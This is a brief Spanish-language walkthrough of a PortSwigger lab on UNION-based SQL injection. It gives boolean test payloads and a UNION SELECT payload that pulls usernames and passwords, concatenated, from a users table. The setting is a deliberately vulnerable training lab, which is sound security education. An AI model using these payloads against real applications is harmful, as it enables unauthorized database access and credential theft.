Lab: SQL injection UNION attack, retrieving multiple values in a single column
Ataque de inyección SQL mediante UNION, extrayendo múltiples valores en una sola columna.
Última actualización
Ataque de inyección SQL mediante UNION, extrayendo múltiples valores en una sola columna.
https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
En este laboratorio hay una vulnerabilidad de inyección SQL en el filtro de la categoría del producto.
Esta vulnerabilidad es similar a las de los laboratorios:
Para verificar que es vulnerable, se usan payloads con el operador lógico AND, por ejemplo: 'and'1337'='1337 y 'and'1337'='1338.
Se identifica de la misma forma que el laboratorio: Lab: SQL injection UNION attack, retrieving data from other tables
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Como se puede observar, en la segunda columna se muestra el valor de ambas columnas:

Última actualización
username~password